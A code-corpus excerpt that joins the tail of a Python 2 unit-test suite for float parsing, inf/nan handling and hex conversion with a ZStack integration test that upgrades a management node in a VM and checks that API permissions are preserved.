self.assertEqual(float(" 25.e-1 "), 2.5)
self.assertEqual(test_support.fcmp(float(" .25e-1 "), .025), 0)
def test_floatconversion(self):
# Make sure that calls to __float__() work properly
class Foo0:
def __float__(self):
return 42.
class Foo1(object):
def __float__(self):
return 42.
class Foo2(float):
def __float__(self):
return 42.
class Foo3(float):
def __new__(cls, value=0.):
return float.__new__(cls, 2*value)
def __float__(self):
return self
class Foo4(float):
def __float__(self):
return 42
self.assertAlmostEqual(float(Foo0()), 42.)
self.assertAlmostEqual(float(Foo1()), 42.)
self.assertAlmostEqual(float(Foo2()), 42.)
self.assertAlmostEqual(float(Foo3(21)), 42.)
self.assertRaises(TypeError, float, Foo4(42))
def test_floatasratio(self):
for f, ratio in [
(0.875, (7, 8)),
(-0.875, (-7, 8)),
(0.0, (0, 1)),
(11.5, (23, 2)),
]:
self.assertEqual(f.as_integer_ratio(), ratio)
for i in range(10000):
f = random.random()
f *= 10 ** random.randint(-100, 100)
n, d = f.as_integer_ratio()
self.assertEqual(float(n).__truediv__(d), f)
R = fractions.Fraction
self.assertEqual(R(0, 1),
R(*float(0.0).as_integer_ratio()))
self.assertEqual(R(5, 2),
R(*float(2.5).as_integer_ratio()))
self.assertEqual(R(1, 2),
R(*float(0.5).as_integer_ratio()))
self.assertEqual(R(4728779608739021, 2251799813685248),
R(*float(2.1).as_integer_ratio()))
self.assertEqual(R(-4728779608739021, 2251799813685248),
R(*float(-2.1).as_integer_ratio()))
self.assertEqual(R(-2100, 1),
R(*float(-2100.0).as_integer_ratio()))
self.assertRaises(OverflowError, float('inf').as_integer_ratio)
self.assertRaises(OverflowError, float('-inf').as_integer_ratio)
self.assertRaises(ValueError, float('nan').as_integer_ratio)
class FormatFunctionsTestCase(unittest.TestCase):
def setUp(self):
self.save_formats = {'double':float.__getformat__('double'),
'float':float.__getformat__('float')}
def tearDown(self):
float.__setformat__('double', self.save_formats['double'])
float.__setformat__('float', self.save_formats['float'])
def test_getformat(self):
self.assert_(float.__getformat__('double') in
['unknown', 'IEEE, big-endian', 'IEEE, little-endian'])
self.assert_(float.__getformat__('float') in
['unknown', 'IEEE, big-endian', 'IEEE, little-endian'])
self.assertRaises(ValueError, float.__getformat__, 'chicken')
self.assertRaises(TypeError, float.__getformat__, 1)
def test_setformat(self):
for t in 'double', 'float':
float.__setformat__(t, 'unknown')
if self.save_formats[t] == 'IEEE, big-endian':
self.assertRaises(ValueError, float.__setformat__,
t, 'IEEE, little-endian')
elif self.save_formats[t] == 'IEEE, little-endian':
self.assertRaises(ValueError, float.__setformat__,
t, 'IEEE, big-endian')
else:
self.assertRaises(ValueError, float.__setformat__,
t, 'IEEE, big-endian')
self.assertRaises(ValueError, float.__setformat__,
t, 'IEEE, little-endian')
self.assertRaises(ValueError, float.__setformat__,
t, 'chicken')
self.assertRaises(ValueError, float.__setformat__,
'chicken', 'unknown')
BE_DOUBLE_INF = '\x7f\xf0\x00\x00\x00\x00\x00\x00'
LE_DOUBLE_INF = ''.join(reversed(BE_DOUBLE_INF))
BE_DOUBLE_NAN = '\x7f\xf8\x00\x00\x00\x00\x00\x00'
LE_DOUBLE_NAN = ''.join(reversed(BE_DOUBLE_NAN))
BE_FLOAT_INF = '\x7f\x80\x00\x00'
LE_FLOAT_INF = ''.join(reversed(BE_FLOAT_INF))
BE_FLOAT_NAN = '\x7f\xc0\x00\x00'
LE_FLOAT_NAN = ''.join(reversed(BE_FLOAT_NAN))
# on non-IEEE platforms, attempting to unpack a bit pattern
# representing an infinity or a NaN should raise an exception.
class UnknownFormatTestCase(unittest.TestCase):
def setUp(self):
self.save_formats = {'double':float.__getformat__('double'),
'float':float.__getformat__('float')}
float.__setformat__('double', 'unknown')
float.__setformat__('float', 'unknown')
def tearDown(self):
float.__setformat__('double', self.save_formats['double'])
float.__setformat__('float', self.save_formats['float'])
def test_double_specials_dont_unpack(self):
for fmt, data in [('>d', BE_DOUBLE_INF),
('>d', BE_DOUBLE_NAN),
('<d', LE_DOUBLE_INF),
('<d', LE_DOUBLE_NAN)]:
self.assertRaises(ValueError, struct.unpack, fmt, data)
def test_float_specials_dont_unpack(self):
for fmt, data in [('>f', BE_FLOAT_INF),
('>f', BE_FLOAT_NAN),
('<f', LE_FLOAT_INF),
('<f', LE_FLOAT_NAN)]:
self.assertRaises(ValueError, struct.unpack, fmt, data)
# on an IEEE platform, all we guarantee is that bit patterns
# representing infinities or NaNs do not raise an exception; all else
# is accident (today).
# let's also try to guarantee that -0.0 and 0.0 don't get confused.
class IEEEFormatTestCase(unittest.TestCase):
if float.__getformat__("double").startswith("IEEE"):
def test_double_specials_do_unpack(self):
for fmt, data in [('>d', BE_DOUBLE_INF),
('>d', BE_DOUBLE_NAN),
('<d', LE_DOUBLE_INF),
('<d', LE_DOUBLE_NAN)]:
struct.unpack(fmt, data)
if float.__getformat__("float").startswith("IEEE"):
def test_float_specials_do_unpack(self):
for fmt, data in [('>f', BE_FLOAT_INF),
('>f', BE_FLOAT_NAN),
('<f', LE_FLOAT_INF),
('<f', LE_FLOAT_NAN)]:
struct.unpack(fmt, data)
if float.__getformat__("double").startswith("IEEE"):
def test_negative_zero(self):
import math
def pos_pos():
return 0.0, math.atan2(0.0, -1)
def pos_neg():
return 0.0, math.atan2(-0.0, -1)
def neg_pos():
return -0.0, math.atan2(0.0, -1)
def neg_neg():
return -0.0, math.atan2(-0.0, -1)
self.assertEquals(pos_pos(), neg_pos())
self.assertEquals(pos_neg(), neg_neg())
if float.__getformat__("double").startswith("IEEE"):
def test_underflow_sign(self):
import math
# check that -1e-1000 gives -0.0, not 0.0
self.assertEquals(math.atan2(-1e-1000, -1), math.atan2(-0.0, -1))
self.assertEquals(math.atan2(float('-1e-1000'), -1),
math.atan2(-0.0, -1))
class ReprTestCase(unittest.TestCase):
def test_repr(self):
floats_file = open(os.path.join(os.path.split(__file__)[0],
'floating_points.txt'))
for line in floats_file:
line = line.strip()
if not line or line.startswith('#'):
continue
v = eval(line)
self.assertEqual(v, eval(repr(v)))
floats_file.close()
# Beginning with Python 2.6 float has cross platform compatible
# ways to create and represent inf and nan
class InfNanTest(unittest.TestCase):
def test_inf_from_str(self):
self.assert_(isinf(float("inf")))
self.assert_(isinf(float("+inf")))
self.assert_(isinf(float("-inf")))
self.assert_(isinf(float("infinity")))
self.assert_(isinf(float("+infinity")))
self.assert_(isinf(float("-infinity")))
self.assertEqual(repr(float("inf")), "inf")
self.assertEqual(repr(float("+inf")), "inf")
self.assertEqual(repr(float("-inf")), "-inf")
self.assertEqual(repr(float("infinity")), "inf")
self.assertEqual(repr(float("+infinity")), "inf")
self.assertEqual(repr(float("-infinity")), "-inf")
self.assertEqual(repr(float("INF")), "inf")
self.assertEqual(repr(float("+Inf")), "inf")
self.assertEqual(repr(float("-iNF")), "-inf")
self.assertEqual(repr(float("Infinity")), "inf")
self.assertEqual(repr(float("+iNfInItY")), "inf")
self.assertEqual(repr(float("-INFINITY")), "-inf")
self.assertEqual(str(float("inf")), "inf")
self.assertEqual(str(float("+inf")), "inf")
self.assertEqual(str(float("-inf")), "-inf")
self.assertEqual(str(float("infinity")), "inf")
self.assertEqual(str(float("+infinity")), "inf")
self.assertEqual(str(float("-infinity")), "-inf")
self.assertRaises(ValueError, float, "info")
self.assertRaises(ValueError, float, "+info")
self.assertRaises(ValueError, float, "-info")
self.assertRaises(ValueError, float, "in")
self.assertRaises(ValueError, float, "+in")
self.assertRaises(ValueError, float, "-in")
self.assertRaises(ValueError, float, "infinit")
self.assertRaises(ValueError, float, "+Infin")
self.assertRaises(ValueError, float, "-INFI")
self.assertRaises(ValueError, float, "infinitys")
def test_inf_as_str(self):
self.assertEqual(repr(1e300 * 1e300), "inf")
self.assertEqual(repr(-1e300 * 1e300), "-inf")
self.assertEqual(str(1e300 * 1e300), "inf")
self.assertEqual(str(-1e300 * 1e300), "-inf")
def test_nan_from_str(self):
self.assert_(isnan(float("nan")))
self.assert_(isnan(float("+nan")))
self.assert_(isnan(float("-nan")))
self.assertEqual(repr(float("nan")), "nan")
self.assertEqual(repr(float("+nan")), "nan")
self.assertEqual(repr(float("-nan")), "nan")
self.assertEqual(repr(float("NAN")), "nan")
self.assertEqual(repr(float("+NAn")), "nan")
self.assertEqual(repr(float("-NaN")), "nan")
self.assertEqual(str(float("nan")), "nan")
self.assertEqual(str(float("+nan")), "nan")
self.assertEqual(str(float("-nan")), "nan")
self.assertRaises(ValueError, float, "nana")
self.assertRaises(ValueError, float, "+nana")
self.assertRaises(ValueError, float, "-nana")
self.assertRaises(ValueError, float, "na")
self.assertRaises(ValueError, float, "+na")
self.assertRaises(ValueError, float, "-na")
def test_nan_as_str(self):
self.assertEqual(repr(1e300 * 1e300 * 0), "nan")
self.assertEqual(repr(-1e300 * 1e300 * 0), "nan")
self.assertEqual(str(1e300 * 1e300 * 0), "nan")
self.assertEqual(str(-1e300 * 1e300 * 0), "nan")
def notest_float_nan(self):
self.assert_(NAN.is_nan())
self.failIf(INF.is_nan())
self.failIf((0.).is_nan())
def notest_float_inf(self):
self.assert_(INF.is_inf())
self.failIf(NAN.is_inf())
self.failIf((0.).is_inf())
fromHex = float.fromhex
toHex = float.hex
class HexFloatTestCase(unittest.TestCase):
MAX = fromHex('0x.fffffffffffff8p+1024') # max normal
MIN = fromHex('0x1p-1022') # min normal
TINY = fromHex('0x0.0000000000001p-1022') # min subnormal
EPS = fromHex('0x0.0000000000001p0') # diff between 1.0 and next float up
def identical(self, x, y):
# check that floats x and y are identical, or that both
# are NaNs
if isnan(x) or isnan(y):
if isnan(x) == isnan(y):
return
elif x == y and (x != 0.0 or copysign(1.0, x) == copysign(1.0, y)):
return
self.fail('%r not identical to %r' % (x, y))
def test_ends(self):
self.identical(self.MIN, ldexp(1.0, -1022))
self.identical(self.TINY, ldexp(1.0, -1074))
self.identical(self.EPS, ldexp(1.0, -52))
self.identical(self.MAX, 2.*(ldexp(1.0, 1023) - ldexp(1.0, 970)))
def test_invalid_inputs(self):
invalid_inputs = [
'infi', # misspelt infinities and nans
'-Infinit',
'++inf',
'-+Inf',
'--nan',
'+-NaN',
'snan',
'NaNs',
'nna',
'0xnan',
'',
' ',
'x1.0p0',
'0xX1.0p0',
'+ 0x1.0p0', # internal whitespace
'- 0x1.0p0',
'0 x1.0p0',
'0x 1.0p0',
'0x1 2.0p0',
'+0x1 .0p0',
'0x1. 0p0',
'-0x1.0 1p0',
'-0x1.0 p0',
'+0x1.0p +0',
'0x1.0p -0',
'0x1.0p 0',
'+0x1.0p+ 0',
'-0x1.0p- 0',
'++0x1.0p-0', # double signs
'--0x1.0p0',
'+-0x1.0p+0',
'-+0x1.0p0',
'0x1.0p++0',
'+0x1.0p+-0',
'-0x1.0p-+0',
'0x1.0p--0',
'0x1.0.p0',
'0x.p0', # no hex digits before or after point
'0x1,p0', # wrong decimal point character
'0x1pa',
u'0x1p\uff10', # fullwidth Unicode digits
u'\uff10x1p0',
u'0x\uff11p0',
u'0x1.\uff10p0',
'0x1p0 \n 0x2p0',
'0x1p0\0 0x1p0', # embedded null byte is not end of string
]
for x in invalid_inputs:
try:
result = fromHex(x)
except ValueError:
pass
else:
self.fail('Expected float.fromhex(%r) to raise ValueError; '
'got %r instead' % (x, result))
def test_from_hex(self):
MIN = self.MIN;
MAX = self.MAX;
TINY = self.TINY;
EPS = self.EPS;
# two spellings of infinity, with optional signs; case-insensitive
self.identical(fromHex('inf'), INF)
self.identical(fromHex('+Inf'), INF)
self.identical(fromHex('-INF'), -INF)
self.identical(fromHex('iNf'), INF)
self.identical(fromHex('Infinity'), INF)
self.identical(fromHex('+INFINITY'), INF)
self.identical(fromHex('-infinity'), -INF)
self.identical(fromHex('-iNFiNitY'), -INF)
# nans with optional sign; case insensitive
self.identical(fromHex('nan'), NAN)
self.identical(fromHex('+NaN'), NAN)
self.identical(fromHex('-NaN'), NAN)
self.identical(fromHex('-nAN'), NAN)
# variations in input format
self.identical(fromHex('1'), 1.0)
self.identical(fromHex('+1'), 1.0)
self.identical(fromHex('1.'), 1.0)
self.identical(fromHex('1.0'), 1.0)
self.identical(fromHex('1.0p0'), 1.0)
self.identical(fromHex('01'), 1.0)
self.identical(fromHex('01.'), 1.0)
self.identical(fromHex('0x1'), 1.0)
self.identical(fromHex('0x1.'), 1.0)
self.identical(fromHex('0x1.0'), 1.0)
self.identical(fromHex('+0x1.0'), 1.0)
self.identical(fromHex('0x1p0'), 1.0)
self.identical(fromHex('0X1p0'), 1.0)
self.identical(fromHex('0X1P0'), 1.0)
self.identical(fromHex('0x1P0'), 1.0)
self.identical(fromHex('0x1.p0'), 1.0)
self.identical(fromHex('0x1.0p0'), 1.0)
self.identical(fromHex('0x.1p4'), 1.0)
self.identical(fromHex('0x.1p04'), 1.0)
self.identical(fromHex('0x.1p004'), 1.0)
self.identical(fromHex('0x1p+0'), 1.0)
self.identical(fromHex('0x1P-0'), 1.0)
self.identical(fromHex('+0x1p0'), 1.0)
self.identical(fromHex('0x01p0'), 1.0)
self.identical(fromHex('0x1p00'), 1.0)
self.identical(fromHex(u'0x1p0'), 1.0)
self.identical(fromHex(' 0x1p0 '), 1.0)
self.identical(fromHex('\n 0x1p0'), 1.0)
self.identical(fromHex('0x1p0 \t'), 1.0)
self.identical(fromHex('0xap0'), 10.0)
self.identical(fromHex('0xAp0'), 10.0)
self.identical(fromHex('0xaP0'), 10.0)
self.identical(fromHex('0xAP0'), 10.0)
self.identical(fromHex('0xbep0'), 190.0)
self.identical(fromHex('0xBep0'), 190.0)
self.identical(fromHex('0xbEp0'), 190.0)
self.identical(fromHex('0XBE0P-4'), 190.0)
self.identical(fromHex('0xBEp0'), 190.0)
self.identical(fromHex('0xB.Ep4'), 190.0)
self.identical(fromHex('0x.BEp8'), 190.0)
self.identical(fromHex('0x.0BEp12'), 190.0)
# moving the point around
pi = fromHex('0x1.921fb54442d18p1')
self.identical(fromHex('0x.006487ed5110b46p11'), pi)
self.identical(fromHex('0x.00c90fdaa22168cp10'), pi)
self.identical(fromHex('0x.01921fb54442d18p9'), pi)
self.identical(fromHex('0x.03243f6a8885a3p8'), pi)
self.identical(fromHex('0x.06487ed5110b46p7'), pi)
self.identical(fromHex('0x.0c90fdaa22168cp6'), pi)
self.identical(fromHex('0x.1921fb54442d18p5'), pi)
self.identical(fromHex('0x.3243f6a8885a3p4'), pi)
self.identical(fromHex('0x.6487ed5110b46p3'), pi)
self.identical(fromHex('0x.c90fdaa22168cp2'), pi)
self.identical(fromHex('0x1.921fb54442d18p1'), pi)
self.identical(fromHex('0x3.243f6a8885a3p0'), pi)
self.identical(fromHex('0x6.487ed5110b46p-1'), pi)
self.identical(fromHex('0xc.90fdaa22168cp-2'), pi)
self.identical(fromHex('0x19.21fb54442d18p-3'), pi)
self.identical(fromHex('0x32.43f6a8885a3p-4'), pi)
self.identical(fromHex('0x64.87ed5110b46p-5'), pi)
self.identical(fromHex('0xc9.0fdaa22168cp-6'), pi)
self.identical(fromHex('0x192.1fb54442d18p-7'), pi)
self.identical(fromHex('0x324.3f6a8885a3p-8'), pi)
self.identical(fromHex('0x648.7ed5110b46p-9'), pi)
self.identical(fromHex('0xc90.fdaa22168cp-10'), pi)
self.identical(fromHex('0x1921.fb54442d18p-11'), pi)
# ...
self.identical(fromHex('0x1921fb54442d1.8p-47'), pi)
self.identical(fromHex('0x3243f6a8885a3p-48'), pi)
self.identical(fromHex('0x6487ed5110b46p-49'), pi)
self.identical(fromHex('0xc90fdaa22168cp-50'), pi)
self.identical(fromHex('0x1921fb54442d18p-51'), pi)
self.identical(fromHex('0x3243f6a8885a30p-52'), pi)
self.identical(fromHex('0x6487ed5110b460p-53'), pi)
self.identical(fromHex('0xc90fdaa22168c0p-54'), pi)
self.identical(fromHex('0x1921fb54442d180p-55'), pi)
# results that should overflow...
self.assertRaises(OverflowError, fromHex, '-0x1p1024')
self.assertRaises(OverflowError, fromHex, '0x1p+1025')
self.assertRaises(OverflowError, fromHex, '+0X1p1030')
self.assertRaises(OverflowError, fromHex, '-0x1p+1100')
self.assertRaises(OverflowError, fromHex, '0X1p123456789123456789')
self.assertRaises(OverflowError, fromHex, '+0X.8p+1025')
self.assertRaises(OverflowError, fromHex, '+0x0.8p1025')
self.assertRaises(OverflowError, fromHex, '-0x0.4p1026')
self.assertRaises(OverflowError, fromHex, '0X2p+1023')
self.assertRaises(OverflowError, fromHex, '0x2.p1023')
self.assertRaises(OverflowError, fromHex, '-0x2.0p+1023')
self.assertRaises(OverflowError, fromHex, '+0X4p+1022')
self.assertRaises(OverflowError, fromHex, '0x1.ffffffffffffffp+1023')
self.assertRaises(OverflowError, fromHex, '-0X1.fffffffffffff9p1023')
self.assertRaises(OverflowError, fromHex, '0X1.fffffffffffff8p1023')
self.assertRaises(OverflowError, fromHex, '+0x3.fffffffffffffp1022')
self.assertRaises(OverflowError, fromHex, '0x3fffffffffffffp+970')
self.assertRaises(OverflowError, fromHex, '0x10000000000000000p960')
self.assertRaises(OverflowError, fromHex, '-0Xffffffffffffffffp960')
# ...and those that round to +-max float
self.identical(fromHex('+0x1.fffffffffffffp+1023'), MAX)
self.identical(fromHex('-0X1.fffffffffffff7p1023'), -MAX)
self.identical(fromHex('0X1.fffffffffffff7fffffffffffffp1023'), MAX)
# zeros
self.identical(fromHex('0x0p0'), 0.0)
self.identical(fromHex('0x0p1000'), 0.0)
self.identical(fromHex('-0x0p1023'), -0.0)
self.identical(fromHex('0X0p1024'), 0.0)
self.identical(fromHex('-0x0p1025'), -0.0)
self.identical(fromHex('0X0p2000'), 0.0)
self.identical(fromHex('0x0p123456789123456789'), 0.0)
self.identical(fromHex('-0X0p-0'), -0.0)
self.identical(fromHex('-0X0p-1000'), -0.0)
self.identical(fromHex('0x0p-1023'), 0.0)
self.identical(fromHex('-0X0p-1024'), -0.0)
self.identical(fromHex('-0x0p-1025'), -0.0)
self.identical(fromHex('-0x0p-1072'), -0.0)
self.identical(fromHex('0X0p-1073'), 0.0)
self.identical(fromHex('-0x0p-1074'), -0.0)
self.identical(fromHex('0x0p-1075'), 0.0)
self.identical(fromHex('0X0p-1076'), 0.0)
self.identical(fromHex('-0X0p-2000'), -0.0)
self.identical(fromHex('-0x0p-123456789123456789'), -0.0)
# values that should underflow to 0
self.identical(fromHex('0X1p-1075'), 0.0)
self.identical(fromHex('-0X1p-1075'), -0.0)
self.identical(fromHex('-0x1p-123456789123456789'), -0.0)
self.identical(fromHex('0x1.00000000000000001p-1075'), TINY)
self.identical(fromHex('-0x1.1p-1075'), -TINY)
self.identical(fromHex('0x1.fffffffffffffffffp-1075'), TINY)
# check round-half-even is working correctly near 0 ...
self.identical(fromHex('0x1p-1076'), 0.0)
self.identical(fromHex('0X2p-1076'), 0.0)
self.identical(fromHex('0X3p-1076'), TINY)
self.identical(fromHex('0x4p-1076'), TINY)
self.identical(fromHex('0X5p-1076'), TINY)
self.identical(fromHex('0X6p-1076'), 2*TINY)
self.identical(fromHex('0x7p-1076'), 2*TINY)
self.identical(fromHex('0X8p-1076'), 2*TINY)
self.identical(fromHex('0X9p-1076'), 2*TINY)
self.identical(fromHex('0xap-1076'), 2*TINY)
self.identical(fromHex('0Xbp-1076'), 3*TINY)
self.identical(fromHex('0xcp-1076'), 3*TINY)
self.identical(fromHex('0Xdp-1076'), 3*TINY)
self.identical(fromHex('0Xep-1076'), 4*TINY)
self.identical(fromHex('0xfp-1076'), 4*TINY)
self.identical(fromHex('0x10p-1076'), 4*TINY)
self.identical(fromHex('-0x1p-1076'), -0.0)
self.identical(fromHex('-0X2p-1076'), -0.0)
self.identical(fromHex('-0x3p-1076'), -TINY)
self.identical(fromHex('-0X4p-1076'), -TINY)
self.identical(fromHex('-0x5p-1076'), -TINY)
self.identical(fromHex('-0x6p-1076'), -2*TINY)
self.identical(fromHex('-0X7p-1076'), -2*TINY)
self.identical(fromHex('-0X8p-1076'), -2*TINY)
self.identical(fromHex('-0X9p-1076'), -2*TINY)
self.identical(fromHex('-0Xap-1076'), -2*TINY)
self.identical(fromHex('-0xbp-1076'), -3*TINY)
self.identical(fromHex('-0xcp-1076'), -3*TINY)
self.identical(fromHex('-0Xdp-1076'), -3*TINY)
self.identical(fromHex('-0xep-1076'), -4*TINY)
self.identical(fromHex('-0Xfp-1076'), -4*TINY)
self.identical(fromHex('-0X10p-1076'), -4*TINY)
# ... and near MIN ...
self.identical(fromHex('0x0.ffffffffffffd6p-1022'), MIN-3*TINY)
self.identical(fromHex('0x0.ffffffffffffd8p-1022'), MIN-2*TINY)
self.identical(fromHex('0x0.ffffffffffffdap-1022'), MIN-2*TINY)
self.identical(fromHex('0x0.ffffffffffffdcp-1022'), MIN-2*TINY)
self.identical(fromHex('0x0.ffffffffffffdep-1022'), MIN-2*TINY)
self.identical(fromHex('0x0.ffffffffffffe0p-1022'), MIN-2*TINY)
self.identical(fromHex('0x0.ffffffffffffe2p-1022'), MIN-2*TINY)
self.identical(fromHex('0x0.ffffffffffffe4p-1022'), MIN-2*TINY)
self.identical(fromHex('0x0.ffffffffffffe6p-1022'), MIN-2*TINY)
self.identical(fromHex('0x0.ffffffffffffe8p-1022'), MIN-2*TINY)
self.identical(fromHex('0x0.ffffffffffffeap-1022'), MIN-TINY)
self.identical(fromHex('0x0.ffffffffffffecp-1022'), MIN-TINY)
self.identical(fromHex('0x0.ffffffffffffeep-1022'), MIN-TINY)
self.identical(fromHex('0x0.fffffffffffff0p-1022'), MIN-TINY)
self.identical(fromHex('0x0.fffffffffffff2p-1022'), MIN-TINY)
self.identical(fromHex('0x0.fffffffffffff4p-1022'), MIN-TINY)
self.identical(fromHex('0x0.fffffffffffff6p-1022'), MIN-TINY)
self.identical(fromHex('0x0.fffffffffffff8p-1022'), MIN)
self.identical(fromHex('0x0.fffffffffffffap-1022'), MIN)
self.identical(fromHex('0x0.fffffffffffffcp-1022'), MIN)
self.identical(fromHex('0x0.fffffffffffffep-1022'), MIN)
self.identical(fromHex('0x1.00000000000000p-1022'), MIN)
self.identical(fromHex('0x1.00000000000002p-1022'), MIN)
self.identical(fromHex('0x1.00000000000004p-1022'), MIN)
self.identical(fromHex('0x1.00000000000006p-1022'), MIN)
self.identical(fromHex('0x1.00000000000008p-1022'), MIN)
self.identical(fromHex('0x1.0000000000000ap-1022'), MIN+TINY)
self.identical(fromHex('0x1.0000000000000cp-1022'), MIN+TINY)
self.identical(fromHex('0x1.0000000000000ep-1022'), MIN+TINY)
self.identical(fromHex('0x1.00000000000010p-1022'), MIN+TINY)
self.identical(fromHex('0x1.00000000000012p-1022'), MIN+TINY)
self.identical(fromHex('0x1.00000000000014p-1022'), MIN+TINY)
self.identical(fromHex('0x1.00000000000016p-1022'), MIN+TINY)
self.identical(fromHex('0x1.00000000000018p-1022'), MIN+2*TINY)
# ... and near 1.0.
self.identical(fromHex('0x0.fffffffffffff0p0'), 1.0-EPS)
self.identical(fromHex('0x0.fffffffffffff1p0'), 1.0-EPS)
self.identical(fromHex('0X0.fffffffffffff2p0'), 1.0-EPS)
self.identical(fromHex('0x0.fffffffffffff3p0'), 1.0-EPS)
self.identical(fromHex('0X0.fffffffffffff4p0'), 1.0-EPS)
self.identical(fromHex('0X0.fffffffffffff5p0'), 1.0-EPS/2)
self.identical(fromHex('0X0.fffffffffffff6p0'), 1.0-EPS/2)
self.identical(fromHex('0x0.fffffffffffff7p0'), 1.0-EPS/2)
self.identical(fromHex('0x0.fffffffffffff8p0'), 1.0-EPS/2)
self.identical(fromHex('0X0.fffffffffffff9p0'), 1.0-EPS/2)
self.identical(fromHex('0X0.fffffffffffffap0'), 1.0-EPS/2)
self.identical(fromHex('0x0.fffffffffffffbp0'), 1.0-EPS/2)
self.identical(fromHex('0X0.fffffffffffffcp0'), 1.0)
self.identical(fromHex('0x0.fffffffffffffdp0'), 1.0)
self.identical(fromHex('0X0.fffffffffffffep0'), 1.0)
self.identical(fromHex('0x0.ffffffffffffffp0'), 1.0)
self.identical(fromHex('0X1.00000000000000p0'), 1.0)
self.identical(fromHex('0X1.00000000000001p0'), 1.0)
self.identical(fromHex('0x1.00000000000002p0'), 1.0)
self.identical(fromHex('0X1.00000000000003p0'), 1.0)
self.identical(fromHex('0x1.00000000000004p0'), 1.0)
self.identical(fromHex('0X1.00000000000005p0'), 1.0)
self.identical(fromHex('0X1.00000000000006p0'), 1.0)
self.identical(fromHex('0X1.00000000000007p0'), 1.0)
self.identical(fromHex('0x1.00000000000007ffffffffffffffffffffp0'),
1.0)
self.identical(fromHex('0x1.00000000000008p0'), 1.0)
self.identical(fromHex('0x1.00000000000008000000000000000001p0'),
1+EPS)
self.identical(fromHex('0X1.00000000000009p0'), 1.0+EPS)
self.identical(fromHex('0x1.0000000000000ap0'), 1.0+EPS)
self.identical(fromHex('0x1.0000000000000bp0'), 1.0+EPS)
self.identical(fromHex('0X1.0000000000000cp0'), 1.0+EPS)
self.identical(fromHex('0x1.0000000000000dp0'), 1.0+EPS)
self.identical(fromHex('0x1.0000000000000ep0'), 1.0+EPS)
self.identical(fromHex('0X1.0000000000000fp0'), 1.0+EPS)
self.identical(fromHex('0x1.00000000000010p0'), 1.0+EPS)
self.identical(fromHex('0X1.00000000000011p0'), 1.0+EPS)
self.identical(fromHex('0x1.00000000000012p0'), 1.0+EPS)
self.identical(fromHex('0X1.00000000000013p0'), 1.0+EPS)
self.identical(fromHex('0X1.00000000000014p0'), 1.0+EPS)
self.identical(fromHex('0x1.00000000000015p0'), 1.0+EPS)
self.identical(fromHex('0x1.00000000000016p0'), 1.0+EPS)
self.identical(fromHex('0X1.00000000000017p0'), 1.0+EPS)
self.identical(fromHex('0x1.00000000000017ffffffffffffffffffffp0'),
1.0+EPS)
self.identical(fromHex('0x1.00000000000018p0'), 1.0+2*EPS)
self.identical(fromHex('0X1.00000000000018000000000000000001p0'),
1.0+2*EPS)
self.identical(fromHex('0x1.00000000000019p0'), 1.0+2*EPS)
self.identical(fromHex('0X1.0000000000001ap0'), 1.0+2*EPS)
self.identical(fromHex('0X1.0000000000001bp0'), 1.0+2*EPS)
self.identical(fromHex('0x1.0000000000001cp0'), 1.0+2*EPS)
self.identical(fromHex('0x1.0000000000001dp0'), 1.0+2*EPS)
self.identical(fromHex('0x1.0000000000001ep0'), 1.0+2*EPS)
self.identical(fromHex('0X1.0000000000001fp0'), 1.0+2*EPS)
self.identical(fromHex('0x1.00000000000020p0'), 1.0+2*EPS)
def test_roundtrip(self):
def roundtrip(x):
return fromHex(toHex(x))
for x in [NAN, INF, self.MAX, self.MIN, self.MIN-self.TINY, self.TINY, 0.0]:
self.identical(x, roundtrip(x))
self.identical(-x, roundtrip(-x))
# fromHex(toHex(x)) should exactly recover x, for any non-NaN float x.
import random
for i in xrange(10000):
e = random.randrange(-1200, 1200)
m = random.random()
s = random.choice([1.0, -1.0])
try:
x = s*ldexp(m, e)
except OverflowError:
pass
else:
self.identical(x, fromHex(toHex(x)))
def test_main():
test_support.run_unittest(
GeneralFloatCases,
FormatFunctionsTestCase,
UnknownFormatTestCase,
IEEEFormatTestCase,
ReprTestCase,
InfNanTest,
HexFloatTestCase,
)
if __name__ == '__main__':
test_main()
| lgpl-2.1 |
zstackio/zstack-woodpecker | integrationtest/vm/installation/api_perimission_check/test_zs_upgd_3.5.2_latest_on_cos74_22976.py | 1 | 2730 | '''
#Cover 22976
based on test_zs_upgd_3.5.2_latest_on_cos74.py
Test the upgrade master from 3.5.2.53 & check API permissions
@author: Zhaohao
'''
import os
import tempfile
import uuid
import time
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.test_lib as test_lib
import zstackwoodpecker.test_state as test_state
import zstacklib.utils.ssh as ssh
import zstackwoodpecker.operations.scenario_operations as scen_ops
test_stub = test_lib.lib_get_test_stub()
test_obj_dict = test_state.TestStateDict()
tmp_file = '/tmp/%s' % uuid.uuid1().get_hex()
vm_inv = None
def test():
global vm_inv
test_util.test_dsc('Create test vm to test zstack upgrade by -u.')
image_name = os.environ.get('imageNameBase_352_mn_c74')
c74_iso_path = os.environ.get('c74_iso_path')
#iso_21_path = os.environ.get('iso_21_path')
zstack_latest_version = os.environ.get('zstackLatestVersion')
zstack_latest_path = os.environ.get('zstackLatestInstaller')
vm_name = os.environ.get('vmName')
upgrade_script_path = os.environ.get('upgradeScript')
vm_inv = test_stub.create_vm_scenario(image_name, vm_name)
vm_ip = vm_inv.vmNics[0].ip
test_lib.lib_wait_target_up(vm_ip, 22)
test_stub.make_ssh_no_password(vm_ip, tmp_file)
test_util.test_logger('Update MN IP')
test_stub.update_mn_hostname(vm_ip, tmp_file)
test_stub.update_mn_ip(vm_ip, tmp_file)
test_stub.stop_mn(vm_ip, tmp_file)
test_stub.start_node(vm_ip, tmp_file)
test_stub.start_mn(vm_ip, tmp_file)
test_stub.check_mn_running(vm_ip, tmp_file)
test_stub.create_vid(vm_ip, 'vid_test')
pms1 = test_stub.get_vid_permissions(vm_ip, 'vid_test')
#test_stub.check_installation(vm_ip, tmp_file)
test_util.test_logger('Upgrade zstack to latest')
test_stub.update_c74_iso(vm_ip, tmp_file, c74_iso_path, upgrade_script_path)
#test_stub.updatei_21_iso(vm_ip, tmp_file, iso_21_path, upgrade_script_path)
test_stub.upgrade_zstack(vm_ip, zstack_latest_path, tmp_file)
test_stub.check_zstack_version(vm_ip, tmp_file, zstack_latest_version)
test_stub.start_mn(vm_ip, tmp_file)
test_stub.check_mn_running(vm_ip, tmp_file)
pms2 = test_stub.get_vid_permissions(vm_ip, 'vid_test')
test_stub.check_permissions(pms1, pms2)
#test_stub.check_installation(vm_ip, tmp_file)
os.system('rm -f %s' % tmp_file)
test_stub.destroy_vm_scenario(vm_inv.uuid)
test_util.test_pass('ZStack 3.5.2 to master upgrade Test Success')
